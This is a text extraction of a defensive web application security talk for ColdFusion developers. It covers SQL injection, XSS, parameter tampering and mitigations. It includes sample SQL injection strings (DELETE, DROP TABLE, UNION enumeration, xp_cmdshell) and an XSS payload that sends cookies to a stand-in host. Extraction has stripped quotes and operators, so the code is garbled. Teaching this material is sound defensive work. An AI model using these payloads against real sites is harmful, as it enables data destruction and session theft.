Web Application Security: Practicing Defense InDepth

1
Web Application Security Practicing Defense
In-Depth

• Dean H. Saxe
• dean_at_fullfrontalnerdity.com

2
Tonights Presentation

• What will be covered
• OWASP Top Ten
• Defense In Depth - The Onion Model
• Penetration testing
• Web App Firewalls
• Web Application Vulnerability Scanners
• Tools
• Resources

3
Security Misconceptions

• The Firewall protects my web server and database
• Access to the server through ports 80 and 443
  makes the web server part of your external
  perimeter defenses
• Vulnerabilities in the web server software or web
  applications may allow access to internal network
  resources

4
Security Misconceptions

• The IDS protects my web server and database
• The IDS is configured to detect signatures of
  various well-known attacks
• Attack signatures do not include those for
  attacks against custom applications

5
Security Misconceptions

• SSL secures my site
• SSL secures the transport of data between the web
  server and the users browser
• SSL does not protect against attacks against the
  server and applications
• SSL is the hackers best friend due to the false
  sense of security

6
Open Web Application Security Project

• http//www.owasp.org
• OWASP Top Ten Vulnerabilities
• OWASP Guide
• OWASP Testing Guide
• WebGoat
• And much more to come

7
Web Applications First Line of Defense?

• Requests can be sent from around the world
• Jon Postel on TCP/IP
• Be liberal in what you accept and conservative
  in what you send
• Not all HTTP requests are valid but are often
  accepted by the web server
• Many webapps are liberal in what they accept
  (poor validation) resulting in undesirable
  behaviors

8
SQL Injection I

• SQL Injection is a command injection attack
  caused by unvalidated input and string-building
  to craft DB queries
• Attacker sends specially crafted data to the
  application in order to modify the queries being
  sent to the DB

9
SQL Injection II

• SELECT
• FROM accounts
• WHERE acct_id URL.acct_id

10
SQL Injection III

• GET /view_account.cfm?acct_id28 HTTP/1.1
• SELECT
• FROM accounts
• WHERE acct_id 28

11
SQL Injection IV

• GET /view_account.cfm?acct_id28 OR 11 HTTP/1.1
• SELECT
• FROM accounts
• WHERE acct_id 28 OR 11

12
SQL Injection V

• SELECT
• FROM users
• WHERE username URL.lastname

13
SQL Injection VI

• GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
• SELECT
• FROM users
• WHERE lastname OMalley

14
SQL Injection VII

• ltcfset URL.lastname URL.lastnamegt
• SELECT
• FROM users
• WHERE username preserveSingleQuotes(URL.lastnam
  e)
• GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
• SELECT
• FROM users
• WHERE lastname OMalley

15
SQL Injection VIII

• GET /user_lookup.cfm? lastnamefooDELETE FROM
  users WHERE 11 HTTP/1.1
• SELECT
• FROM users
• WHERE lastname fooDELETE FROM users WHERE
  11

16
SQL Injection IX

• CF 5 bug prevents escaping of single quotes in
  queries when the variable being evaluated uses
  array syntax.
• SELECT
• FROM users
• WHERE username URLlastname
• GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
• SELECT
• FROM users
• WHERE lastname OMalley

17
SQL Injection Useful Injection Strings

• acct_id28 OR 1 1
• Try various OR clauses using ltgt, gt, gt, LIKE,
  etc.
• Use comments to end a statement prematurely
• SELECT FROM users WHERE user_id 1-- AND
  passwordmypass
• Enumerate database information
• acct_id28 UNION SELECT name ,1,2, FROM
  sysobjects WHERE xtypeU
• acct_id28 UNION SELECT columnames FROM table
• UNION requires both statements to share a common
  number of columns, add columns as required

18
SQL Injection SQL Server

• Concatenate multiple statements with semicolons
• acct_id28 DROP TABLE Users
• Useful Stored Procedures
• xp_msver
• xp_cmdshell command
• xp_servicecontrol action service

19
SQL Injection Oracle

• Multiple statements not allowed
• Enumerate database
• acct_id28 UNION SELECT username FROM all_users
• acct_id28 UNION SELECT object_type, owner FROM
  all_objects
• Abuse ALL_, USER_, V views

20
SQL Injection Mitigation Techniques

• Principle of Least Privileges
• Database should run with lowest possible system
  privileges
• Database users should be allowed the least
  possible privileges. Disable privileges to
  stored procedures, tables, etc when not required.
• Limit execution privileges for users to SELECT,
  UPDATE, DELETE and user stored procedures
• Dont use sa!

21
SQL Injection Prevention

• Parameterized queries
• ltcfqueryparamgt
• ltcfstoredprocparamgt
• Cant be used with cachedwithin, cacheduntil
  attributes of ltcfquerygt
• Data validation
• Stored procedures

22
Cross Site Scripting (XSS)

• Attacker injects client-side scripts (JavaScript)
  into the browser
• Code is executed by the browser to perform some
  action
• Major XSS methods
• Social Engineering Entice user to click on link
  with malicious payload
• Stored data invokes JavaScript when the user
  views a page (e.g. user forums)

23
XSS Examples

• ltscriptgtlocation.hrefhttp//10.1.1.1/steal.cfm?c
  document.cookielt/scriptgt
• lta hrefjavas99ript35codegt
• ltdiv stylebehaviour url(link to code)gt
• ltbody onloadcodegt
• ltimg srcjavascriptcodegt
• Attempt hex and double-Unicode encoding to
  subvert blacklists
• And many, many more.

24
Cross Site Scripting Prevention

• Input validation
• Output filtering
• htmlEditFormat()
• Replaces lt, gt, , with their entity values
• extendedHtmlEditFormat()
• Write a UDF to escape special characters in
  content that may be used for XSS
• Replace lt, gt, , , (, ), with their entity
  values
• Wrap all output with potentially dangerous
  characters in the UDF
• Ability to quickly add new characters quickly if
  new attacks are discovered

25
Parameter Tampering

• Modifying pre-set variables in order to subvert
  application logic
• Change a list of states to include the option
  value
• GADELETE FROM users WHERE 1 1
• Modification of cookies, query strings, hidden
  fields, select boxes, check boxes, radio buttons
  and other fixed data
• Change cookie value adminn gt adminy to elevate
  privileges
• Index.cfm?modedebug can be used to elicit the
  debug mode of ColdFusion, potentially revealing
  template and database info.
• ltcfsetting showdebugoutputfalsegt in
  Application.cfm will prevent debug information
  from ever being show.
• Limiting debug output to 127.0.0.1 on production
  servers can also be used

26
Parameter Tampering Prevention

• Data validation
• Must be server-side, client-side validation with
  JavaScript can be subverted easily
• Ensures data is within specified character set,
  length, etc.
• Validate multiple pieces of information which are
  interdependent
• Validate all data from the browser (CGI.,
  COOKIE., FORM., URL.) for content, extra
  fields, missing fields, duplicated fields
• All validation must be complete before any
  further processing of the request. Consider
  moving validated data to a new scope
  (VALIDATED.FORM.field_name) for easy code reviews

27
Whitelist vs. Blacklist

• Whats a blacklist?
• Blacklists are a used for negative assertion that
  the data being analyzed is not in the blacklist
• Whats a whitelist?
• Whitelists are used for positive assertion that
  the data being analyzed match an item in the
  whitelist
• Which is better and why?

28
Whitelist Is a Better Approach

• Searching for valid data easier than invalid data
• Attackers represent data in many different manners

29
Building a Better Validation Engine

• Identify general data types and valid content for
  each
• Alphabetic
• Alphanumeric
• Special characters
• Numeric
• Integer
• Floating point
• Comma or period delimited? Negative numbers?
• HTML content
• Limit accepted tags and attributes with
  whitelists for acceptable content

30
Building a Better Validation Engine II

• Validate all data received from the users
  browser
• Hidden form fields, check boxes, select boxes all
  require validation!
• Use indirection rather than primary keys
• Present user with a select box with option values
  of 1..N, referencing the ordinal position of the
  item in an array in the users state
• Validate value is within the bounds of the array

31
Building a Better Validation Engine Indirection

• ltselect nameacct_idgt
• ltcfoutput querylist_accountsgt
• ltoption valueacct_idgtacct_name
  acct_numberlt/optiongt
• lt/cfoutputgt
• lt/selectgt
• ltcfset VARIABLES.acct_id_array arrayNew(1)gt
• ltselect nameacct_idgt
• ltcfoutput querylist_accountsgt
• ltcfset arrayAppend(VARIABLES.acct_id_array,
  acct_id)gt
• ltoption
• valuearrayLen(VARIABLES.acct_id_array)gt
• acct_nameacct_number
• lt/optiongt
• lt/cfoutputgt
• lt/selectgt

32
Building a Better Validation Engine VI

• Requirements for a better engine
• Register form fields with their validation
  routines when creating views
• Automatic indirection
• Automatic server-side validation cannot be
  subverted by developer
• Easy to scan for proper use of validation engine
• Built-in validators for common data types
• Additional client-side validation, too!
• Where is this mythical product for CF?

33
Error Handling

• Application Errors
• Errors are an attackers best friend since they
  often reveal sensitive information
• Hide the error from the user by logging
  server-side and providing a unique ID to
  reference the error
• Data validation errors
• Bad Input
• Malicious Input

34
Encryption and Hashing

• Encryption is used to hide data
• Hashing is used to verify integrity of data
• Both are generally used improperly leading to a
  false sense of security
• Practical Cryptography by Niels Ferguson and
  Bruce Schneier

35
Web and Applications Server Misconfiguration

• Backup files left accessible in the web root
• Admin directories and applications exposed to the
  outside world
• CFAdministrator
• IIS Control Panel

36
Broken Access Controls

• Forced Browsing
• Malicious user can manually browse to any page on
  the server, potentially escaping access control
• Use an architecture that allows the user to be
  tracked through the application with positive
  assertion that he has access to the page being
  requested and it is not out of sequence for the
  current process

37
Grab Bag

• Secure cookies
• Comments
• Parameter Tampering via Cookie Poisoning
• Add HMAC to cookie to prevent tampering
• Hash(saltvalue) gt HMAC
• Modifying hidden fields
• Store in state data

38
Penetration Testing Your Apps

• Man In The Middle Proxies
• Used to trap HTTP request/response stream and
  modify data on the fly
• Achilles
• Paros
• WebScarab

39
Penetration Testing Your Apps II

• Testing Server Hardening
• Nikto - scan for well known vulnerabilities on
  web servers
• Nmap - Port scanner to scan the network for open
  ports
• Netcat - Network Swiss Army knife. Useful for
  connecting to web servers or other open ports for
  banner grabbing, reconnaisance. Can be used for
  shell shovelling
• openSSL - Open source SSL toolkit. Used to
  create SSL proxy for netcat to explore secure
  webservers

40
Penetration Testing Your Apps III

• Web Application Vulnerability Scanners
• Automatically walk your application, scanning for
  XSS, SQL Injection, server-level vulnerabilities
• WebInspect
• ScanDo
• AppScan
• 6-20 hit rate
• Outsource the work
• There is no body in charge of certifying the
  quality of the work done by various PenTest
  companies. Buyer beware!
• ISS
• FoundStone
• Etc.

41
Securing Your Apps

• Very large body of existing code needs
  remediation
• Identify priorities
• What can be done quickly?
• Configuration of servers
• Global error handling
• Assess value of assets to be protected
• Protect high value assets first

42
Securing Your Apps II

• Web Application Firewalls
• Vendors claim quick deployment to protect apps
• Reality is not so quick, depending on size and
  complexity of app
• Brings business logic into another application
  layer
• Requires identifying params passed to each page,
  writing of appropriate RegEx
• Misses parameter tampering if data matches regex

43
Resources

• OWASP
• SecurityFocus
• SPIDynamics
• FoundStone
• www.hackingexposed.com
• Innocent Code by Sverre H. Huseby
• Training Courses
• Foundstone
• Intense Training

44
Comments/Questions?

• Dean H. Saxe
• dean_at_fullfrontalnerdity.com